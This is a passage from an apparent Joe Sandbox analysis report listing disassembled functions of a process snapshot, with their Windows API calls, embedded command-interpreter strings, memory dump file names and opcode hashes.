                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 497088868-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d2936a102870fc2e473e1021ea05e970d45393d32fae1a659187c67dd0eb2082
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B731C422B1C64B42FB20BB11A4501BDE290BF89B80FC44173E94FC7BA5DEBCE4418720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1529A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1412018758-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 683e940de9068c72f14598f1ca0740ef5181837ca1376a077d913d7874896a00
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09E01242F5971F91FF143B6268811BC92545F6A740FD82472DD1F857A2EFEDA0918730
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 46dcad897a3af043d264e5e9165a4e58e3145294cf8b8be1aaa7afa00ca2a06b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8F04B32A1864782FB54AB05F84006CFBA0FB89B10BD99036D94B03364DFBCE485CA20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1524C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: exit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2483651598-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ca4f8b397122741c5fcccfe2269068fe735008dd1e6df284b4b01d88ebfd9961
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72C0123170464F47FB1C7731645513D95A45B09201FC45479C507D22A2DDBCD4048610
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1525508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: DefaultUser
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3358694519-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 10979a80bf34ff0989239b922509f9a63a90d24d5a349f4383df43e162f965fe
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6E0C2A3E2826B9AF7983A4170413FC9953CB68782FC440B3CB0FC12E0496D2C415228
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1522E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6c5a1ef935451652ba15f2c70175c88724b831a707ff175dd80a81c0825bc7dd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8F0B422B0978A40FF409756B54016D92919B48BF0BD88332EA7E87BE5DE7CD4518300

                                                                                                                                                                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1515B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1388555566-2647954630
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ca97c61ed8a4551062714c4efb30b93cb24ab0fa014687ed39a6ddc984746626
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CAA28032A08B8B86FB50AB21A4542BDF6A1FB49784FD08136DA4F477B5DFBCD4448720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151E680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 511550188-726566285
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 205a45c76b7e442c15cfddb256266c4ab5101c6fc3a1de5e3b3ec62384581d4b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8152BF22A0869B86F766AB15E41027DFAA0FF45B44FD58136D94F437B0DFBCE8918720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1519E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 812COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsnicmp$wcschr$wcstol
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1738779099-3004636944
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a00b937a79521ff436a6a6840599a1e6fadbc548afcf7982894737f1b7940f60
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC729322B0865B8AFB52AF65D0442BDB7A1BB44748FC14036DE0F577A4DFBDA884C320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1537F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1537F44
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1537F5C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1537F9E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1537FFF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538020
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538036
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538061
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1538075
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15380D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D15380EA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D1538177
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D153819A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D15381BD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D15381DC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D15381FB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D153821A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D1538239
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538291
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15382D7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15382FB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D153831A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538364
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1538378
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D153839A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15383AE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15383E6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538403
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538418
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
